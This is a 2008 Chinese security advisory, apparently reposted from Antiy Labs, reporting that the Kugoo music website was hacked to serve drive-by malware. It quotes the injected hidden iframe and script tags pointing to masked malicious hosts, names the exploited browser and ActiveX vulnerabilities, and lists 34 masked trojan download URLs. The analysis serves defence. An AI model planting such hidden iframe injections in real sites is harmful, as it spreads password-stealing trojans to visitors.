当前位置：信息安全资讯首页 >> 网站 >> 酷狗网遭遇黑客入侵　用户小心病毒暗流

酷狗网遭遇黑客入侵　用户小心病毒暗流

2008-04-23 08:47:06 作者：来源：安天实验室浏览次数：153 文字大小：【大】【中】【小】

出处：安天病毒分析组 2008-04-16 12:15

内容：

　　4月16日，安天实验室发现，酷狗网(http://www.kugoo.com/home/)被黑客植入病毒，但挂马时间不定，最长时间达10分钟用户，如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。
　　该网站问题代码：

　

　　src="http://ring.ku***.com/cairing/BuildJs/HomePH.aspx"
　　http://ring.ku***.com/cairing/BuildJs/HomePH.aspx
　　问题框架代码：

　　

　　<iframe src=http://s12.bm***.com/tmp.htm width=0 height=0>
　　</iframe>
　　http://s12.bm***.com/tmp.htm
　　问题框架代码：

　　

　　<script language="javascript" src="count.js"></script>
　　http://s12.bm***.com/count.js
　　问题框架代码：
　
　

　　<iframe src=test.htm width=0 height=0></iframe>
　　http://s12.bm***.com/test.htm
　　问题框架代码：

　

　　<iframe src=http://xxx3.uu****.net/q66.html width=100 height=0>
　　</iframe>
　　http://xxx3.uu***.net/q66.html
　　问题框架代码：

　

　　http://xxx3.uu****.net/news1.html网马代码：

　　
　　该加密网马解密后可知利用以下漏洞来传播：
　　MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
　　暴风影音播放器MPS.StormPlayer漏洞
　　RealPlayer播放器IERPCtl.IERPCtl.1漏洞
　　迅雷漏洞
　　百度搜霸漏洞
　　联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

　　当用户运行酷狗2007或访问酷狗网(http://www.kugoo.com/home/)时，
　　系统会自动下载以下病毒文件：

　　http://aa1.us***.com/down/1.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)

　　http://aa1.us***.com/down/2.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)

　　http://aa1.us***.com/down/3.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafp)

　　http://aa1.us***.com/down/4.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaf)

　　http://aa1.us***.com/down/5.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zjk)

　　http://aa1.us***.com/down/6.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.anv)

　　http://aa1.us***.com/down/7.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.anv)

　　http://aa1.us***.com/down/8.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aadu)

　　http://aa1.us***.com/down/9.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)

　　http://aa1.us***.com/down/10.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/11.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aadz)

　　http://aa2.us***.com/down/12.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafo)

　　http://aa2.us***.com/down/13.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)

　　http://aa2.us***.com/down/14.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)

　　http://aa2.us***.com/down/15.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)

　　http://aa2.us***.com/down/16.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaig)

　　http://aa2.us***.com/down/18.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/19.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/20.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)

　　http://aa3.us***.com/down/21.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)

　　http://aa3.us***.com/down/22.exe
　　病毒名：(Trojan-Downloader.Win32.Tiny.anv)

　　http://aa3.us***.com/down/23.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)

　　http://aa3.us***.com/down/24.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)

　　http://aa3.us***.com/down/25.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)

　　http://aa3.us***.com/down/26.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaes)

　　http://aa3.us***.com/down/27.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)

　　http://aa3.us***.com/down/28.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aasp)

　　http://aa3.us***.com/down/29.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zvr)

　　http://aa3.us***.com/down/30.exe
　　病毒名：(Trojan-Downloader.Win32.Tiny.anv)

　　http://aa3.us***.com/down/31.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.yip)

　　http://aa3.us***.com/down/32.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafg)

　　http://aa3.us***.com/down/33.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafq)

　　http://aa3.us***.com/down/34.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafq)

　　以上病毒文件为下载者木马和游戏盗号木马，自动运行后将会，
盗取用户敏感信息，甚至导致死机。由于下载数量太多，这里不一一分析。

责任编辑：gxis_admin

本文引用地址： http://www.gxis.org/information/2008/0423/article_385.html

发表评论　加入收藏　告诉好友　打印本页　关闭窗口　返回顶部

· 我国将严打非法转播奥运...

· 券商全天候盯防网上黑客攻击

· 微软发布3款SQL INJECTI...

· 黑客为推销防火墙产品攻...

· 趋势发布五月全球威胁总...

· 新型自动化SQL注入攻击引...

· 天融信官方网站疑遭黑客攻击

· 中国互联网近日遭受大范...

· 2008年1月网页挂马漏洞利...

· IBM：SQL注入攻击第三波...

热点文章

· 微软发布3款SQL INJECTI...

· 黑客为推销防火墙产品攻...

· 趋势发布五月全球威胁总...

· 券商全天候盯防网上黑客攻击

· 我国将严打非法转播奥运...

版权所有：广西信息网络安全协会	电话:0771-2639955	传真:0771-2630060
地址:广西壮族自治区南宁市新民路34-52号	邮编:530012	邮箱:2639955#gxis.org(#修改为@)

酷狗网遭遇黑客入侵　用户小心病毒暗流

责任编辑：gxis_admin

最新文章

更多

推荐文章

更多

热点文章

更多

友情链接

更多 >>

酷狗网遭遇黑客入侵 用户小心病毒暗流

责任编辑：gxis_admin

最新文章

更多

推荐文章

更多

热点文章

更多

友情链接

更多 >>

酷狗网遭遇黑客入侵　用户小心病毒暗流